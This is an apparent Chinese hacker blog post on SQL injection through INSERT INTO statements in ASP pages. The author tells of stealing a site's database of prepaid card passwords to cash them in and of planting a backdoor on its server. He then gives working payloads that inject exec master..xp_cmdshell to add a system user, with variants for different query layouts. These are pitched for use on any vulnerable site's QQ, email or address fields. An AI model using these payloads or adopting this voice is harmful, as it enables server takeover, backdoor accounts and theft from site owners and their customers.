剛才到了酷吧，坐在收銀臺(tái)旁邊和收銀的MM聊了幾句話； 突然看到"電影影線"有張海報(bào)，上面寫著： 凡是購買該站點(diǎn)卡密碼最后一位數(shù)是6或7便可獲贈(zèng)面值5元的易卡一張； 我想，這個(gè)網(wǎng)站整個(gè)數(shù)據(jù)在我手里，我要是把那幾十萬張卡全拿去換錢不是發(fā)達(dá)了？ 隨即馬上到他服務(wù)器把庫拿下來，順便在服務(wù)器上再留個(gè)后門； 在過程中有另一個(gè)想法便是本文的重要點(diǎn)；利用insert Into 進(jìn)行注入。
============================================= 關(guān)于SQL注入，以前常用的或很多朋友所懂的也只不過是在select 語句中ID=變量未過產(chǎn)生的注入點(diǎn)，例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"-- ============================================= 我們可否利用insert Into Table的語句進(jìn)行注入呢？
這樣的話,我們可以在某某有漏洞的網(wǎng)站上填寫QQ或Email或地址的地方執(zhí)行任何命令了哦.
記得以前粗略地和"亂刀"討論過，不過一直沒有實(shí)際行動(dòng)，剛才發(fā)現(xiàn)了一下，原來真的可以做到這一點(diǎn)。呵呵。舉下例： 某個(gè)頁面xiaomo.asp中有如下一句代碼： Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我們可以利用Request("U")未過濾的變量執(zhí)行任意系統(tǒng)命令. 這段很簡(jiǎn)單，Request("U")在語句后面，直接提交： http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
便可添加一個(gè)xiaomo密碼為aa的系統(tǒng)用戶 因?yàn)闃?gòu)造的代碼變成了： Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
當(dāng)然理所當(dāng)然地"正確"執(zhí)行了。 ============================================= 我們換個(gè)思路，如果頁面中的漏洞代碼是： Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了，這該怎么辦呢？ 其實(shí)也很簡(jiǎn)單，變通一下即可，提交： http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----
看出來了沒？第一個(gè)變量代表了要寫入的所有變量，而后面就不而而至了，哈哈。。 但有個(gè)問題是，我們必須得知道對(duì)方語句是怎么寫，利在檢查指定程序漏洞時(shí)所應(yīng)用

最新評(píng)論